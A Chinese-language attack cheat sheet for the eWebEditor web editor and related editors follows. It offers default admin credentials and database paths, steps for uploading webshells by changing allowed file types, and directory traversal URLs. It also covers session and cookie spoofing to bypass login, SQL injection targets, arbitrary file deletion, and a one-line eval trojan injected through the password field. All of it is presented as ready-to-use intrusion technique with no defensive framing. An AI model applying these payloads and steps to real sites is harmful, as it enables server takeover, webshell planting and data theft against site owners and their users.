eWebEditor
eWebEditor利用基础知识
默认后台地址:/ewebeditor/admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问
默认数据库路径:[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb--某些CMS里是这个数据库
也可尝试[PATH]/db/%23ewebeditor.mdb--某些管理员自作聪明的小伎俩

使用默认密码:admin/admin888或admin/admin进入后台,也可尝试admin/123456(有些管理员以及一些CMS,就是这么设置的)
点击“样式管理”--可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer,只要是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式,点击插入图片,上传WEBSHELL,在“代码”模式中查看上传文件的路径。
2、当数据库被管理员修改为asp、asa后缀的时候,可以插一句话***服务端进入数据库,然后一句话***客户端连接拿下webshell
3、上传后无法执行?目录没权限?帅锅你回去样式管理看你编辑过的那个样式,里面可以自定义上传路径的!!!
4、设置好了上传类型,依然上传不了麽?估计是文件代码被改了,可以尝试设定“远程类型”依照6.0版本拿SHELL的方法来做(详情见下文↓),能够设定自动保存远程文件的类型。
5、不能添加工具栏,但设定好了某样式中的文件类型,怎么办?↓这么办!
(请修改action字段)
Action.html

eWebEditor踩脚印式***
脆弱描述:
当我们下载数据库后查询不到密码MD5的明文时,可以去看看webeditor_style(14)这个样式表,看看是否有前辈***过或许已经赋予了某控件上传脚本的能力,构造地址来上传我们自己的WEBSHELL.
***利用:
比如ID=46s-name=standard1
构造代码:ewebeditor.asp?id=content&style=standard
ID和和样式名改过后
ewebeditor.asp?id=46&style=standard1
eWebEditor遍历目录漏洞
脆弱描述:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
过滤不严,造成遍历目录漏洞
***利用:
第一种:ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加&dir=../..
&dir=http://www.heimian.com/../..看到整个网站文件了
第二种:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
eWebEditor5.2列目录漏洞
脆弱描述:
ewebeditor/asp/browse.asp
过滤不严,造成遍历目录漏洞
***利用:
http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
利用WebEditorsession欺骗漏洞,进入后台
脆弱描述:
漏洞文件:Admin_Private.asp
只判断了session,没有判断cookies和路径的验证问题。
***利用:
新建一个test.asp内容如下:
<%Session("eWebEditor_User")="11111111"%>
访问test.asp,再访问后台任何文件,forexample:Admin_Default.asp
eWebEditorasp版2.1.6上传漏洞
***利用:(请修改action字段为指定网址)
ewebeditorasp版2.1.6上传漏洞利用程序.html

eWebEditor2.7.0注入漏洞
***利用:
http://www.heimian.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解.

eWebEditor2.8.0最终版删除任意文件漏洞
脆弱描述:
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入。
***利用:(请修改action字段为指定网址)
DelFiles.html

eWebEditorv6.0.0上传漏洞
***利用:
在编辑器中点击“插入图片”--网络--输入你的WEBSHELL在某空间上的地址(注:文件名称必须为:xxx.jpg.asp以此类推…),确定后,点击“远程文件自动上传”控件(第一次上传会提示你安装控件,稍等即可),查看“代码”模式找到文件上传路径,访问即可,eweb官方的DEMO也可以这么做,不过对上传目录取消掉了执行权限,所以上传上去也无法执行网马.
eWebEditorPHP/ASP…后台通杀漏洞
影响版本:PHP≥3.0~3.8与asp2.8版也通用,或许低版本也可以,有待测试。
***利用:
进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了.
这时候你清空浏览器的url,然后输入
alert(document.cookie="adminuser="+escape("admin"));< /span>
alert(document.cookie="adminpass="+escape("admin"));< /span>
alert(document.cookie="admindj="+escape("1"));< /span>
而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php,就会直接进去。

eWebEditorforphp任意文件上传漏洞
影响版本:ewebeditorphpv3.8orolderversion
脆弱描述:
此版本将所有的风格配置信息保存为一个数组$aStyle,在php.ini配置register_global为on的情况下我们可以任意添加自己喜欢的风格,并定义上传类型。
***利用:
phpupload.html

eWebEditorJSP版漏洞
大同小异,我在本文档不想多说了,因为没环境测试,网上垃圾场那么大,不好排查。用JSP编辑器的我觉得eweb会比FCKeditor份额少得多。
给出个连接:http://blog.haaker.cn/post/161.html
还有:http://www.anqn.com/zhuru/article/all/2008-12-04/a09104236.shtml
eWebEditor2.8商业版插一句话***
影响版本:=>2.8商业版
***利用:
登陆后台,点击修改密码---新密码设置为1":evalrequest("h")’
设置成功后,访问asp/config.asp文件即可,一句话***被写入到这个文件里面了.

eWebEditorNetupload.aspx上传漏洞(WebEditorNet)
脆弱描述:
WebEditorNet主要是一个upload.aspx文件存在上传漏洞。
***利用:
默认上传地址:/ewebeditornet/upload.aspx
可以直接上传一个cer的***
如果不能上传则在浏览器地址栏中输入lbtnUpload.click();< /span>
成功以后查看源代码找到uploadsave查看上传保存地址,默认传到uploadfile这个文件夹里。
southidceditor(一般使用v2.8.0版eWeb核心)
http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb
http://www.heimian.com/admin/southidceditor/admin/admin_login.asp
http://www.heimian.com/admin/southidceditor/popup.asp
bigcneditor(eWeb2.7.5VIP核心)
其实所谓的Bigcneditor就是eWebEditor2.7.5的VIP用户版.之所以无法访问admin_login.asp,提示“权限不够”4字真言,估计就是因为其授权“Licensed”问题,或许只允许被授权的机器访问后台才对。
或许上面针对eWebEditorv2.8以下低版本的小动作可以用到这上面来.貌似没多少动作?
--------------------------------------------------------------------------------